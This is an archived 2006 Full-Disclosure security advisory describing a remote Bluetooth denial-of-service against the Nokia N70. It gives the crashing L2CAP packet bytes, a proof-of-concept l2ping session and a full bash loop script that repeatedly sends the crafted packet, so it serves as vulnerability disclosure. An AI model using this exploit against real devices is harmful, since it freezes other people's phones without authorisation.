Network Security: Detailed info on [Full-disclosure] [ Secuobs - Advisory ] Another kind of DoS on Nokia ce

Subject:	[Full-disclosure] [ Secuobs - Advisory ] Another kind of DoS on Nokia cell phones
Date:	Wed, 15 Feb 2006 10:02:03 +0100

[Software affected] Bluetooth Stack on Nokia cell phones

[Version] Nokia N70 and maybe other models

[Impact] Remote Denial of Service, cellular phones begin to be slower and then 
freeze after a short period (within 30 seconds).

[Credits] Pierre Betouin - pierre.betouin@infratech.fr -  Bug found with BSS 
new release v0.8 GPL fuzzer (Bluetooh Stack Smasher - Linux) 

BSS could be downloaded on  http://www.secuobs.com/news/15022006-bss_0_8.shtml

[Vendor] notified now

[Original advisory]

http://www.secuobs.com/news/15022006-nokia_n70.shtml#english
http://www.secuobs.com/news/15022006-nokia_n70.shtml#french

[Concept]

L2CAP packets responsible of the crash are :

7D AF 00 00 41 41 41

Where:

Code field 0x7D (1 byte)
Ident field 0xAF (1 byte)
Length field 0x0000 (2 bytes)

0x41 bytes are random padding.


[Proof of Concept]

# l2ping -c 3 00:15:A0:XX:XX:XX

Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...

0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms

0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms

0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms

3 sent, 3 received, 0% loss

# ./loop.sh 00:15:A0:XX:XX:XX

 (.. snip ..)

# l2ping -c 1 00:15:A0:XX:XX:XX

Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...

no response from 00:15:A0:XX:XX:XX id 0

1 sent, 0 received, 100% loss 


[replay_l2cap_packet_nokiaN70.c] could be downloaded on 
http://www.secuobs.com/replay_l2cap_packet_nokiaN70.c

[Loop.sh] as follows : 

#!/bin/bash

# Another Nokia N70 Bluetooth remote Denial of Service

# Pierre BETOUIN pierre.betouin@infratech.fr

# Feb 14 11:21:58 GMT+1 2006

echo "Another Nokia N70 Bluetooth remote Denial of Service"

echo "Pierre BETOUIN pierre.betouin@infratech.fr"

echo ""

if (( $# < 1 )); then

        echo "Usage: $0  (uses replay_l2cap_packet_nokiaN70)"

        exit

fi

if [ -x ./replay_l2cap_packet_nokiaN70 ]; then

        echo "Kill this prog with \"killall -9 loop.sh\" in another terminal."

        echo "PRESS ENTER TO LAUNCH THE DoS (or Ctrl-c to exit now)"

        echo ""

        read

        while (( 1 )); do       # Infinite loop, a bit dirty, we must say ;)

                ./replay_l2cap_packet_nokiaN70 $1

        done

else

        echo "You must compile replay_l2cap_packet_nokiaN70 before"

        echo "gcc -lbluetooth -o replay_l2cap_packet_nokiaN70 
replay_l2cap_packet_nokiaN70.c"

        exit

fi

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

<Prev in Thread]	Current Thread	[Next in Thread>
[Full-disclosure] [ Secuobs - Advisory ] Bluetooth : DoS on Nokia cell phones, Infratech Research [Full-disclosure] [ Secuobs - Advisory ] Another kind of DoS on Nokia cell phones, Infratech Research <=

Previous by Date:	[Full-disclosure] [EEYEB-20051017] Windows Media Player BMP Heap Overflow, eEye Advisories
Next by Date:	[Full-disclosure] Re: What can a Remote Vulnerability Scanner do in Future?, Aaron
Previous by Thread:	[Full-disclosure] [ Secuobs - Advisory ] Bluetooth : DoS on Nokia cell phones, Infratech Research
Next by Thread:	[VulnWatch] RS-2006-1: Multiple flaws in VHCS 2.x, Roman Medina-Heigl Hernandez
Indexes:	[Date] [Thread] [Top] [All Lists]